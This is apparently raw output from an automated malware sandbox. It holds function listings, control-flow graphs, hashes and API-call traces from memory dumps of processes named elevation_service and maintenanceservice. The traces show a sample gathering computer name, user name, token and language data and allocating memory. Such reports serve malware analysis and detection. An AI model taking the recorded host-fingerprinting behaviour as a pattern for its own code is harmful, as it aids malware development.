                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 4ea0f9c9bdbe6e5546db613517cf81bba5d0f193e3916aaffede43411c7aebb2
                                                                                                                                                                      • Instruction ID: c6f4c98942b8f7abb21fe9ec6d0966c774d9d982489de3fe3a120049e92ada28
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea0f9c9bdbe6e5546db613517cf81bba5d0f193e3916aaffede43411c7aebb2
                                                                                                                                                                      • Instruction Fuzzy Hash: EEE04F3421DA0DBF8E7DBFA8D4C203573F0F65475833D4A1A84D7C6504DA29E881A6D3
                                                                                                                                                                      Function 00895B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1596 895b87-895b99 CreateThread 1599 895cff-895d01 1596->1599 1600 895bb4-895ce4 CreateThread 1599->1600 1601 895d07 1599->1601 1605 895cea 1600->1605 1606 895c01-895d41 1600->1606 1601->1600 1603 895d0d 1601->1603 1605->1606 1608 895cf0-895cf6 1605->1608 1613 895d4b-895d52 1606->1613 1614 895d43 1606->1614 1608->1599 1609 895c20-895c68 1608->1609 1615 895d54 1613->1615 1616 895d45-895d47 1613->1616 1614->1615 1617 895d49 1616->1617 1618 895d5f 1616->1618 1617->1613 1617->1618 1619 895d65 1618->1619 1619->1619
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: 92eeed506218591947deb2788b9174a7c3b880090bf3a39faffa5ea594402def
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: DBE0863060DB4C4FDF5BAB2498103193AE5FB89324F1D01CEC44AD71D1CB6909058792
                                                                                                                                                                      Function 0089ADA0 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: da5683f38c54f8bb5f9849d6319a55476ffae2664003994c7d9a782ff50940f1
                                                                                                                                                                      • Instruction ID: 4f2dc86095476dfa925efec1fd0d9b8128fd7457ec91c330817dc4c4c5c0cc73
                                                                                                                                                                      • Opcode Fuzzy Hash: da5683f38c54f8bb5f9849d6319a55476ffae2664003994c7d9a782ff50940f1
                                                                                                                                                                      • Instruction Fuzzy Hash: 59D0A731B0CB2D8B6E2C76253B1013765D8F74871DB2C8039B427C5200DB14CE02D5C3
                                                                                                                                                                      Function 0089A43C Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: 0b094c2f64cb0e8f9fe75c31e2921013c2dc688071b38801f72b066efe48bdc4
                                                                                                                                                                      • Instruction ID: 4716d74df0bc78d93a5de12ac43bfc47de58f8663ef0abbe588628e1bb9b2413
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b094c2f64cb0e8f9fe75c31e2921013c2dc688071b38801f72b066efe48bdc4
                                                                                                                                                                      • Instruction Fuzzy Hash: CDD0A71471CA084B5D6DBF2C281E63C31E2F698705329041FA40BC3350DD78AD010AC7
                                                                                                                                                                      Function 0089A72B Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 0089A6B2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: ba223632d412acbe82a57bd44cf25a201d048d14213655b287c31b5365f66b67
                                                                                                                                                                      • Instruction ID: aa69892d3e53ae034f9bdad00cf5e05303ba17b855077d2e63b15aab1c85e649
                                                                                                                                                                      • Opcode Fuzzy Hash: ba223632d412acbe82a57bd44cf25a201d048d14213655b287c31b5365f66b67
                                                                                                                                                                      • Instruction Fuzzy Hash: 65D0A72440D749AFCF2E6F79C8C1021BBB0FE2170431E4F5680D3C6815DD29E481A293
                                                                                                                                                                      Function 00898762 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 0089901C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: f9a72a88e2b11adae536adcf1c8ce94995d68f8ac2f58f186513529414979285
                                                                                                                                                                      • Instruction ID: 2957a5a8843bc2d72b56ba71e31c510933aac715efd19763ca5bb20263907669
                                                                                                                                                                      • Opcode Fuzzy Hash: f9a72a88e2b11adae536adcf1c8ce94995d68f8ac2f58f186513529414979285
                                                                                                                                                                      • Instruction Fuzzy Hash: 88D0C934608A6BE66F352A29540422667A4FF4965432E492D8CF3C9045DB2384116150
                                                                                                                                                                      Function 00898DA0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE ref: 00898DAD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: e3b49cd05f4e55328efdbc14981f8ccf5333abcdeb28f13d5537c96824725096
                                                                                                                                                                      • Instruction ID: 4840cc5d79fd89ec7075bd063a88dc1d302da2e57de8aac9fbb7e0b0fa42ec10
                                                                                                                                                                      • Opcode Fuzzy Hash: e3b49cd05f4e55328efdbc14981f8ccf5333abcdeb28f13d5537c96824725096
                                                                                                                                                                      • Instruction Fuzzy Hash: 62D02321209F5FCA4F51FE7C404407A1C53F9837407FD23565453C2164CD264C428202
                                                                                                                                                                      Function 00899316 Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: cd062ec8c4c2fbfa22eae465b1c97e1e259a9778fb078a9b0992bc5e6e8bc516
                                                                                                                                                                      • Instruction ID: c750c6cc01a9d23883f070ac59e3f558695d7af5e24d9118721dbdd3233ae23a
                                                                                                                                                                      • Opcode Fuzzy Hash: cd062ec8c4c2fbfa22eae465b1c97e1e259a9778fb078a9b0992bc5e6e8bc516
                                                                                                                                                                      • Instruction Fuzzy Hash: D8C08C24718502472D1A370C0C1E5793256F348B00F2C005DD0C7C1250C94CCC023242
                                                                                                                                                                      Function 0089599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: fb28c69da4d7310465d370fe73db05c917475b6175cdc8cc661b939dfc6a7344
                                                                                                                                                                      • Instruction ID: d441e254b495d976bd43622a6d819cca7cb085ff1e0e483fd6230873194a1c8b
                                                                                                                                                                      • Opcode Fuzzy Hash: fb28c69da4d7310465d370fe73db05c917475b6175cdc8cc661b939dfc6a7344
                                                                                                                                                                      • Instruction Fuzzy Hash: 8601D66060DE94CFFF17B71C60553797D92F794338F2C059AA08ACB192C9348D019746
                                                                                                                                                                      Function 00898090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 699cca085a1703f469e3cb66463c7a2c8f8dd9bca9f549f315e11d0cb0536dac
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AC048A162D94BEAAE7936881C1B0B47A54F6037A9B1C048A9C06C1220EE5ACE4351AB
                                                                                                                                                                      Function 0089817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 8747528884f426cfd8f6d1bf380858714dcc45cc47751ed77b5ac06a26daf70d
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: ABC092A065850BC75D3836882C0A0B17954F613760F0C4453EC06CA360DE598D4341A2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:77
                                                                                                                                                                      Total number of Limit Nodes:6
                                                                                                                                                                      execution_graph 5588 d181b1 5590 d18075 5588->5590 5589 d18186 CloseHandle 5589->5590 5590->5589 5591 d180a7 5590->5591 5592 d181ad GetTokenInformation 5590->5592 5593 d180ca GetTokenInformation 5590->5593 5592->5590 5593->5590 5638 d18090 5641 d18075 5638->5641 5639 d18186 CloseHandle 5639->5641 5640 d180ca GetTokenInformation 5640->5641 5641->5639 5641->5640 5642 d180a7 5641->5642 5643 d181ad GetTokenInformation 5641->5643 5643->5641 5651 d157f0 5652 d155ac 5651->5652 5652->5651 5653 d155e4 5652->5653 5655 d33870 5652->5655 5656 d33876 5655->5656 5658 d33893 5656->5658 5659 d33720 5656->5659 5658->5652 5662 d20c42 5659->5662 5660 d337dd 5660->5658 5661 d1e050 VirtualAlloc 5661->5662 5662->5659 5662->5660 5662->5661 5594 d15b00 5595 d15bba 5594->5595 5602 d252c0 5595->5602 5597 d15bc7 5601 d15bde 5597->5601 5607 d30080 5597->5607 5603 d252c6 5602->5603 5606 d252ce 5602->5606 5603->5606 5621 d1e050 5603->5621 5606->5597 5611 d30089 5607->5611 5608 d303e0 GetComputerNameW 5608->5611 5609 d30181 VirtualFree 5609->5611 5610 d1e050 VirtualAlloc 5610->5611 5611->5608 5611->5609 5611->5610 5612 d303bf GetUserNameW 5611->5612 5613 d15c7b 5611->5613 5614 d304d6 GetComputerNameW 5611->5614 5612->5611 5615 d18070 5613->5615 5614->5611 5617 d18075 5615->5617 5616 d18186 CloseHandle 5616->5617 5617->5616 5618 d181ad GetTokenInformation 5617->5618 5619 d180ca GetTokenInformation 5617->5619 5620 d180a7 5617->5620 5618->5617 5619->5617 5620->5601 5622 d1e0c3 5621->5622 5623 d1e0d8 VirtualAlloc 5622->5623 5623->5622 5644 d15860 5645 d252c0 VirtualAlloc 5644->5645 5646 d15869 5645->5646 5647 d30080 5 API calls 5646->5647 5648 d1587d 5647->5648 5649 d18070 3 API calls 5648->5649 5650 d15870 5649->5650 5624 d15b42 5625 d15b07 5624->5625 5625->5624 5626 d15cdf CreateThread 5625->5626 5627 d15b68 5625->5627 5626->5627 5628 d154a0 5626->5628 5629 d154b5 5628->5629 5630 d15b87 CreateThread 5631 d15b1c 5630->5631 5635 d15810 5630->5635 5632 d15d0d 5631->5632 5633 d15cdf CreateThread 5631->5633 5634 d15c01 5633->5634 5637 d154a0 5633->5637 5636 d15822 5635->5636 5691 d15b09 5693 d15b16 5691->5693 5692 d15d0d 5693->5692 5694 d15cdf CreateThread 5693->5694 5695 d15c01 5694->5695 5696 d154a0 5694->5696 5663 d155ef 5666 d155ac 5663->5666 5664 d33870 VirtualAlloc 5664->5666 5665 d155e4 5666->5664 5666->5665

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00D152A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 290 d152a0-d153fe 295 d15404-d1540e 290->295 296 d50d4c-d50d4e 290->296 297 d15424 295->297 298 d1539b 297->298 299 d1542a 297->299 300 d15413-d15419 298->300 301 d1539d-d153a1 298->301 299->298 302 d15430-d15443 299->302 303 d152b0-d152b5 301->303 304 d153a7 301->304 304->303 305 d153ad 304->305 306 d153f3-d153f9 305->306 307 d153af 305->307 311 d15355 306->311 312 d1532a 306->312 308 d153e0-d153f1 307->308 308->300 308->306 316 d152d1-d152e7 311->316 317 d152e8-d15363 311->317 312->311 313 d1532c-d1533f 312->313 315 d1536b-d15390 313->315 324 d153c3 315->324 325 d15392-d1539a 315->325 316->317 322 d153d1-d153d5 317->322 323 d15365 317->323 322->301 326 d153d7 322->326 323->322 327 d15367-d15369 323->327 325->301 326->308 328 d15342-d15345 326->328 327->315 329 d15400-d1540e 328->329 330 d1534b 328->330 329->297 330->329 331 d15351-d15353 330->331 331->311
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00D153C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: b8339507a9da0ed61246bf31768a0a58382b14701b730c0b261ca9fe92e993b1
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: AC41D65240DE95EFD72A422474642F07B909B923E2F9D05D7D4E2870EEDDAC5CC19336
                                                                                                                                                                      Function 00D30080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 d30080-d30286 2 d30099-d30575 0->2 3 d3028c 0->3 7 d30155 2->7 8 d3057b 2->8 5 d30445 3->5 5->2 6 d3044b-d30457 5->6 11 d30458-d30472 GetComputerNameW 6->11 10 d302ef-d30495 call d1e050 * 2 7->10 8->7 9 d30581-d30587 8->9 12 d3058b 9->12 10->11 55 d3043e 10->55 18 d303ee-d303f4 11->18 19 d3024c-d30253 11->19 16 d30181 VirtualFree 12->16 17 d3058c-d30591 12->17 25 d301a8-d302ac call d47164 16->25 20 d30597 17->20 21 d304ab-d304af 17->21 33 d300da-d3023f 18->33 34 d303fa 18->34 22 d301e6 19->22 23 d30255 19->23 20->21 26 d3059d 20->26 46 d304c7 21->46 30 d302b1-d302be 22->30 31 d301ec-d30313 call d4715c 22->31 27 d302d3 23->27 25->30 26->21 27->22 42 d302d9 27->42 39 d302c4 30->39 40 d303bf-d303d9 GetUserNameW 30->40 52 d30318-d3031e 31->52 33->19 50 d30241-d3024a 33->50 34->33 43 d30400 34->43 39->40 48 d302ca 39->48 49 d30331 40->49 42->10 51 d3b1ee-d3b49f 43->51 58 d304cc-d304e6 call d49970 GetComputerNameW 46->58 48->27 53 d30171 49->53 54 d30337 49->54 50->19 50->30 56 d30324 52->56 57 d30568-d3056b 52->57 59 d30173 53->59 60 d3013f-d30146 53->60 54->53 61 d3033d 54->61 55->5 56->57 63 d3032a 56->63 57->58 70 d30131 58->70 71 d304ec-d30514 58->71 65 d30230 59->65 60->12 66 d305d0-d305d9 61->66 63->49 65->46 68 d30236-d305c2 65->68 66->51 68->46 74 d305c8-d305c9 68->74 72 d30137 70->72 73 d30089-d3008c 70->73 71->57 72->73 75 d3013d 72->75 73->25 77 d30092 73->77 74->66 75->16 75->60 77->25 78 d30098 77->78 78->2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction ID: a9023ec146798f81d6280289a4ddc59252cc69d9d4d76a2b68926ee7b6c12d8d
                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FD11332418F0D8BCB68EF58D8557EABBE1FBA0310F18461FD886C7164DA74DA458BD2
                                                                                                                                                                      Function 00D18070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 d18070-d1817e 81 d18180 79->81 82 d1813d-d181a5 79->82 83 d18184 81->83 84 d1815f 81->84 96 d181a7 82->96 97 d181bd-d181ca 82->97 85 d18186 CloseHandle 83->85 86 d1818c-d18192 83->86 84->82 88 d18161 84->88 85->86 90 d18115-d18118 86->90 91 d18194 86->91 89 d18163-d18170 call d47164 88->89 89->85 102 d18172 89->102 94 d180a7 90->94 95 d18119-d1811a 90->95 91->90 98 d1819a 91->98 95->94 101 d1811c 95->101 105 d181d0 97->105 106 d180f3 97->106 99 d1813c 98->99 99->83 103 d1820f 101->103 102->86 107 d18215-d1821e 103->107 108 d1808e-d18096 103->108 115 d180c3 105->115 116 d181fe-d18201 GetTokenInformation 105->116 109 d180f5 106->109 110 d1808c 106->110 107->108 118 d18224 107->118 108->83 108->94 109->110 117 d18077 109->117 110->108 115->116 121 d180c9 115->121 116->103 130 d181b7 116->130 119 d181d7-d181de call d4715c 117->119 118->119 120 d18226 118->120 128 d181e3-d181e6 119->128 120->119 123 d18228-d182ee call d15d90 120->123 126 d180ca-d180d8 GetTokenInformation 121->126 145 d182f0 123->145 146 d1830c-d1831e 123->146 129 d1810f 126->129 128->126 144 d18089 128->144 131 d18111 129->131 132 d1812d 129->132 130->103 135 d181b9-d181bb 130->135 131->132 137 d18113 131->137 139 d18133 132->139 140 d180a8 132->140 135->97 137->90 139->99 143 d181ed-d181f0 139->143 142 d180aa-d180ad 140->142 142->89 147 d180b3-d18203 142->147 148 d181f6 143->148 149 d180da-d180f1 143->149 144->126 150 d1808b 144->150 145->146 151 d182f2 145->151 154 d182a1-d182ba call d15d90 call d1ec00 146->154 155 d18320 146->155 147->89 158 d18209 147->158 148->149 153 d181fc 148->153 149->142 150->110 156 d182f7-d182fc call d15d90 151->156 153->116 154->155 155->156 160 d18322 155->160 169 d18253-d18265 call d31280 156->169 170 d18302 156->170 160->156 163 d18324-d18326 160->163 164 d18328 163->164 174 d18335 164->174 175 d182df-d1832b 164->175 169->164 182 d1826b 169->182 170->169 173 d18308-d1830a 170->173 173->146 176 d1826e-d18285 174->176 175->174 179 d1832d-d18331 175->179 180 d18287 176->180 181 d1829b-d1829d 176->181 179->174 183 d1824c 180->183 181->154 182->176 184 d18239 182->184 183->181 185 d1824e-d18252 183->185 184->164 186 d1823f-d18243 184->186 185->176 186->156 186->183
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction ID: e1a45aac2afc7136ac56e80e0c0b67bf01bca030fafe5c3004ddbb7bdfc51fbb
                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction Fuzzy Hash: 9161D431A0CB89BFC766CB28B8142F56AA0FB59350F5C0656E496C31A0DF348CC5B376
                                                                                                                                                                      Function 00D15910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 d15910-d15912 188 d15950-d15968 187->188 189 d15915-d15928 call d49970 187->189 188->189 190 d1596a 188->190 195 d159b8 call d30df0 189->195 193 d15970-d1597b 190->193 194 d1592f 190->194 197 d159d4 193->197 198 d1597d 193->198 194->189 196 d15931-d2072c 194->196 204 d159bd-d159c2 call d15d90 195->204 206 d20732-d20738 196->206 207 d20806-d20809 196->207 201 d159d8 197->201 202 d1593b-d15a15 call d311a0 197->202 198->197 203 d1597f-d15981 198->203 210 d159d9-d159de call d42190 201->210 208 d15983-d15a38 203->208 216 d159c7-d159ce 204->216 213 d20800 206->213 214 d2073e 206->214 220 d2079d-d207a6 207->220 221 d15994-d1599c 208->221 222 d15a3e 208->222 210->221 241 d159e0 210->241 213->207 219 d206b3-d206b7 213->219 214->213 223 d20744-d20774 214->223 230 d159d0 216->230 231 d15a1a-d15a26 216->231 219->220 227 d206bd 219->227 228 d20791-d20793 220->228 229 d207a8 220->229 225 d15a02 221->225 226 d1599e-d159f7 221->226 233 d15a2c-d15a34 222->233 234 d206d5-d206d9 223->234 235 d2077a-d2081c 223->235 225->193 226->225 227->220 237 d206c3-d207fe 227->237 238 d207ca-d207cc 228->238 229->228 239 d207aa 229->239 230->231 240 d159d2-d159de 230->240 231->233 242 d159a1-d159b5 call d15e10 231->242 233->210 246 d206db 234->246 247 d206df 234->247 235->220 237->213 239->238 240->221 240->241 241->221 248 d159e2-d159ec 241->248 242->195 255 d15a08-d15a0b 242->255 246->247 250 d206dd 246->250 247->220 253 d15a62-d15a6e 248->253 254 d159ee-d159ef 248->254 250->247 256 d2c0cc 250->256 257 d15a70 253->257 258 d15a75-d15ab3 call d31280 253->258 254->208 259 d159f1 254->259 255->221 262 d15a0d 255->262 263 d2c0e8-d2c102 256->263 264 d2c0ce-d2c0d0 256->264 257->258 260 d15a72 257->260 277 d15ab5 258->277 278 d15abb-d15ac9 258->278 259->189 260->258 270 d15991 262->270 271 d15932 262->271 265 d2c0d2-d2c0df 263->265 266 d2c104 263->266 264->265 273 d2c0e7 265->273 266->265 266->273 270->271 275 d15993 270->275 275->221 277->278 279 d15ab7-d15ab9 277->279 280 d15af2-d15af5 278->280 279->278 284 d15ad5 280->284 285 d15adb-d15adc 280->285 284->285 286 d15ad7-d15ad9 284->286 287 d15ae2 285->287 288 d15a45-d15a46 285->288 286->285 287->288 289 d15ae8 287->289 289->280
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.1418833358.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_d10000_maintenanceservice.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: aef6b1c78a2fbcfdce190f84e779add133a5b2bdda092f92053a4324ee1a7821
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 15F14A2171CE588FC769A71C78513BAB7D2EBD9310F5C419EE08AC3297DD289C4687B2
                                                                                                                                                                      Function 00D15B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
